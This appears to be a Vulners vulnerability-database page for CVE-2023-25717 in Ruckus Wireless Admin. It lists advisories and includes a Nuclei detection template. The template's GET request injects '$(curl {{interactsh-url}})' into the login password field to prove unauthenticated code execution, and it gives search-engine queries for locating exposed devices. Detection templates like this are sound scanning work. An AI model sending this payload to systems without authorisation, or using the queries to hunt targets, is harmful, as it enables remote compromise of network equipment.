| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2023-25717 | 13 Feb 202300:00 | – | attackerkb | |
| The vulnerability of the Ruckus Wireless Admin panel for Ruckus Wireless network devices allows a intruder to execute arbitrary code. | 11 May 202300:00 | – | bdu_fstec | |
| CVE-2023-25717 | 13 Feb 202322:29 | – | circl | |
| Multiple Ruckus Wireless Products CSRF and RCE Vulnerability | 12 May 202300:00 | – | cisa_kev | |
| CISA Adds Seven Known Exploited Vulnerabilities to Catalog | 12 May 202312:00 | – | cisa | |
| Ruckus Wireless SmartZone 代码注入漏洞 | 13 Feb 202300:00 | – | cnnvd | |
| CVE-2023-25717 | 13 Feb 202300:00 | – | cve | |
| CVE-2023-25717 | 13 Feb 202300:00 | – | cvelist | |
| Actors, Threats and Vulnerabilities 08 to 14 May 2023 | 16 May 202306:27 | – | hivepro | |
| Update now! Ruckus vulnerability added to CISA’s list of actively exploited bugs | 15 May 202323:00 | – | malwarebytes |
id: CVE-2023-25717
info:
name: Ruckus Wireless Admin - Remote Code Execution
author: parthmalhotra,pdresearch
severity: critical
description: |
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
impact: |
Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
remediation: |
Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
reference:
- https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
- https://support.ruckuswireless.com/security_bulletins/315
- https://nvd.nist.gov/vuln/detail/CVE-2023-25717
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25717
cwe-id: CWE-94
epss-score: 0.95107
epss-percentile: 0.99853
cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ruckuswireless
product: ruckus_wireless_admin
shodan-query:
- title:"ruckus wireless"
- http.title:"ruckus wireless"
fofa-query: title="ruckus wireless"
google-query: intitle:"ruckus wireless"
tags: cve2023,cve,ruckus,rce,kev,ruckuswireless,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), 'user-agent','curl')
- status_code_1 == 302
condition: and
# digest: 490a0046304402207f68d398a3b5bcec23ee648cefdbdc5bdba0ddcc7e31f5a5cd630ad51ce23ea6022019858bea135cc5018826bb258388558be185f20bec523ffed00928370ae7ca4e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation